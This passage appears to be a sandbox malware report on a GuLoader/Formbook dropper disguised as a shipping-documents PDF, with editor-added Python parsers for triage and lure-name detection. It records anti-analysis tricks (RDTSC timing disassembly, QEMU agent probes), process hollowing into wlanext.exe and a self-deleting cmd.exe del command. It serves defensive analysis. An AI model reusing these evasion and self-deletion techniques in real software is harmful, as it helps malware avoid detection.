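        # The API list is comma-terminated, so drop the empty trailing item.
        for api in filter(None, m.group("apis").split(",")):
            entry.sites[api].add(m.group("addr"))
    return procs


def flag_techniques(procs):
    """Per process, the techniques whose complete API set was observed."""
    return {proc: [name for name, needed in TECHNIQUE_RULES.items()
                   if needed <= entry.apis]
            for proc, entry in procs.items()}


if __name__ == "__main__":
    procs = parse_code_function_lines(SAMPLE_LINES)
    for proc, hits in flag_techniques(procs).items():
        print(f"{proc:>2} {procs[proc].image}: {hits or 'nothing flagged'}")
```

On the constructed subset, process 0 is flagged only for the weak thread-hiding indicator, processes 1 and 11 for both hollowing and APC injection, and explorer.exe for nothing, which is the same picture the report's signature list paints. Because the evidence is static (call sites present in dumped code), a hit means the capability is there, not that the sequence executed; the report's separate behavioural signatures are what confirm it ran.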
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3C6E30
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E472EF7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E4722AE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E472B28
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DEBB0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E46DBD2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E471FF1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B841F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E461002
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3BB090
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E4720A8
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E471D55
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A0D20
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3C4120
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3AF900
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E472D07
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E4725DD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D2581
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3BD5E0
      Source: C:\Windows\explorer.exe | Code function: 3_2_061F4A32
      Source: C:\Windows\explorer.exe | Code function: 3_2_061EB072
      Source: C:\Windows\explorer.exe | Code function: 3_2_061F7A6F
      Source: C:\Windows\explorer.exe | Code function: 3_2_061EB069
      Source: C:\Windows\explorer.exe | Code function: 3_2_061F3862
      Source: C:\Windows\explorer.exe | Code function: 3_2_061ECCF2
      Source: C:\Windows\explorer.exe | Code function: 3_2_061ECCEC
      Source: C:\Windows\explorer.exe | Code function: 3_2_061EFB1F
      Source: C:\Windows\explorer.exe | Code function: 3_2_061F7B0E
      Source: C:\Windows\explorer.exe | Code function: 3_2_061F2132
      Source: C:\Windows\explorer.exe | Code function: 3_2_061EFB22
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352AB40
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D2B28
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035C03DA
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035CDBD2
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0353EBB0
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035BFA2B
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D22AE
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0350F900
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03524120
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035C1002
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035DE824
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D28EC
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0351B090
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D20A8
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035DDFCE
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D1FF1
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035CD616
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03526E30
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D2EF7
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D1D55
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D2D07
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03500D20
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D25DD
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0351D5E0
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03532581
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035CD466
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0351841F
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6DB7D
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C52D89
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C52D90
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C59E40
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C59E3B
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6DFC9
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C52FB0
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0350B150 appears 48 times
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: String function: 1E3AB150 appears 35 times
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000000.00000002.241735598.0000000002090000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.318768141.000000001E62F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312668816.0000000002590000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000000.240728958.0000000000414000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamefdselskontrol.exe vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamewlanext.exej% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312648510.0000000002540000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe | Binary or memory string: OriginalFilenamefdselskontrol.exe vs Shipping Documents (INV,PL,BL)_pdf.exe
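The "OriginalFilename ... vs ..." lines compare the OriginalFilename field of every VERSIONINFO resource the sandbox found against the name the sample was run under. Most of them are noise: user32, ntdll.dll, CRYPT32.DLL.MUI and mswsock.dll.mui are the resources of modules loaded into the process and can never match. The evidence that matters is the static one, where the file on disk calls itself fdselskontrol.exe while it was delivered as "Shipping Documents (INV,PL,BL)_pdf.exe" (a document name with an _pdf suffix in front of the real .exe extension, which is what the two "suspicious name" signatures above are about); the wlanext.exe hit from a process-1 memory dump is the image of the hollowing target, not a second identity of the sample. The following is an added example by the editor, not part of the report or of any vendor tool: it parses lines in this format (cells separated by a space; the trailing "j%" the sandbox prints after a resource string is stripped), grades each pair by how much it is worth as evidence, and applies a lure-name test to the on-disk name. The sample lines are a constructed subset copied from the report, and the grading rules are the editor's own.

```python
import re

# Constructed sample: a subset of the report's "OriginalFilename ... vs" lines.
# "j%" is what the sandbox prints after the resource string; it is not part of
# the file name.
SAMPLE_LINES = """
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000000.00000002.241735598.0000000002090000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs Shipping Documents (INV,PL,BL)_pdf.exe
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.318768141.000000001E62F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping Documents (INV,PL,BL)_pdf.exe
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000000.240728958.0000000000414000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamefdselskontrol.exe vs Shipping Documents (INV,PL,BL)_pdf.exe
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamewlanext.exej% vs Shipping Documents (INV,PL,BL)_pdf.exe
Source: Shipping Documents (INV,PL,BL)_pdf.exe Binary or memory string: OriginalFilenamefdselskontrol.exe vs Shipping Documents (INV,PL,BL)_pdf.exe
"""

LINE_RE = re.compile(
    r"^Source:\s+(?P<sample>.+?)(?:,\s+(?P<dump>\S+\.sdmp))?\s+"
    r"Binary or memory string:\s+OriginalFilename(?P<original>.+?)(?:j%)?"
    r"\s+vs\s+(?P<name>.+?)\s*$"
)

# A document-type token glued in front of an executable extension: the
# classic e-mail lure ("invoice_pdf.exe", "scan.doc.scr", ...).
LURE_NAME_RE = re.compile(
    r"[._\- ](pdf|doc|docx|xls|xlsx|ppt|pptx|jpg|jpeg|png|txt|zip)"
    r"\.(exe|scr|com|pif|bat|cmd)$", re.I)


def parse_originalfilename_lines(text):
    """Extract (dump, OriginalFilename, on-disk name) from each evidence line."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append({
                "dump": m.group("dump"),        # None: the source is the file itself
                "original": m.group("original"),
                "name": m.group("name"),
            })
    return records


def classify(record):
    """Grade one OriginalFilename/name pair as evidence (editor's own rules)."""
    original = record["original"].lower()
    if not original.endswith(".exe"):
        # Version resources of DLLs / .MUI files loaded into the process.
        return "module resource (expected)"
    if original == record["name"].lower():
        return "consistent"
    # An .exe name that differs from the sample's own name.  From the file on
    # disk this is a renamed binary; from a memory dump it may instead be the
    # image of an injected target (wlanext.exe here), so grade it lower.
    return "mismatch (static)" if record["dump"] is None else "mismatch (memory)"


def is_lure_name(name):
    return LURE_NAME_RE.search(name) is not None


def strongest_finding(records):
    """The OriginalFilename the binary itself carries, when it disagrees."""
    for r in records:
        if classify(r) == "mismatch (static)":
            return r["original"]
    return None


if __name__ == "__main__":
    recs = parse_originalfilename_lines(SAMPLE_LINES)
    for r in recs:
        print(f"{classify(r):<28} {r['original']}")
    print("built as:", strongest_finding(recs),
          "| lure name:", is_lure_name(recs[0]["name"]))
```

The same grading transfers to a static triage script that reads the resource with a PE parser instead of from a report: compare OriginalFilename against the delivered name, ignore hits from anything that is not the sample's own image, and treat a document-style double extension as a separate, independent indicator.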
      Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@4/3
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_01
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\~DFCBA05B85C1CFCA00.TMPJump to behavior
      Source: Shipping Documents (INV,PL,BL)_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Shipping Documents (INV,PL,BL)_pdf.exeVirustotal: Detection: 21%
      Source: unknownProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.296872528.000000000E1C0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp, wlanext.exe, 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Shipping Documents (INV,PL,BL)_pdf.exe, wlanext.exe
      Source: Binary string: wlanext.pdb source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmp
      Source: Binary string: wlanext.pdbGCTL source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.296872528.000000000E1C0000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match | File source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F8356 push ds; iretd
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F8365 push ds; iretd
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F07CD pushad ; retf
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F07EE pushad ; retf
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3FD0D1 push ecx; ret
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00568355 push ds; iretd
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_00568365 push ds; iretd
      Source: C:\Windows\explorer.exe | Code function: 3_2_061F83E6 pushad ; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0355D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6705B push esi; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C66989 push edi; retf
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C67C5E push esi; iretd
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C67D40 push eax; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6CEE2 push eax; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6CEEB push eax; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6CE95 push eax; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C69666 push ss; iretd
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C66679 push ebp; retf
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6AE79 push ebx; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6BE12 push ebp; ret
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_00C6CF4C push eax; ret

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xED
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0D0F NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0E46 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0E55 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0EB1 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0EF6 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0F55 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0FA7 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0FEC TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F1039 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F1083 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F10D7 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F117A TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0D81 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0DE0 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F11F6 TerminateProcess,
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | RDTSC instruction interceptor: First address: 00000000020F8088 second address: 00000000020F8088 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0E14EF96D8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007F0E14EF96F6h 0x00000021 test cx, cx 0x00000024 test eax, ecx 0x00000026 add edi, edx 0x00000028 pushad 0x00000029 mov ah, 87h 0x0000002b cmp ah, FFFFFF87h 0x0000002e jne 00007F0E14EF4D8Ch 0x00000034 popad 0x00000035 dec dword ptr [ebp+000000F8h] 0x0000003b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000042 jne 00007F0E14EF967Fh 0x00000044 cmp ax, cx 0x00000047 cmp dh, dh 0x00000049 call 00007F0E14EF975Bh 0x0000004e call 00007F0E14EF96EAh 0x00000053 lfence 0x00000056 mov edx, dword ptr [7FFE0014h] 0x0000005c lfence 0x0000005f ret 0x00000060 mov esi, edx 0x00000062 pushad 0x00000063 rdtsc
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: Shipping Documents (INV,PL,BL)_pdf.exe | Binary or memory string: ROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: Shipping Documents (INV,PL,BL)_pdf.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | RDTSC instruction interceptor: First address: 00000000020F8088 second address: 00000000020F8088 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0E14EF96D8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007F0E14EF96F6h 0x00000021 test cx, cx 0x00000024 test eax, ecx 0x00000026 add edi, edx 0x00000028 pushad 0x00000029 mov ah, 87h 0x0000002b cmp ah, FFFFFF87h 0x0000002e jne 00007F0E14EF4D8Ch 0x00000034 popad 0x00000035 dec dword ptr [ebp+000000F8h] 0x0000003b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000042 jne 00007F0E14EF967Fh 0x00000044 cmp ax, cx 0x00000047 cmp dh, dh 0x00000049 call 00007F0E14EF975Bh 0x0000004e call 00007F0E14EF96EAh 0x00000053 lfence 0x00000056 mov edx, dword ptr [7FFE0014h] 0x0000005c lfence 0x0000005f ret 0x00000060 mov esi, edx 0x00000062 pushad 0x00000063 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | RDTSC instruction interceptor: First address: 00000000020F80AA second address: 00000000020F80AA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0E1437EC20h 0x0000001f popad 0x00000020 call 00007F0E1437E629h 0x00000025 lfence 0x00000028 rdtsc
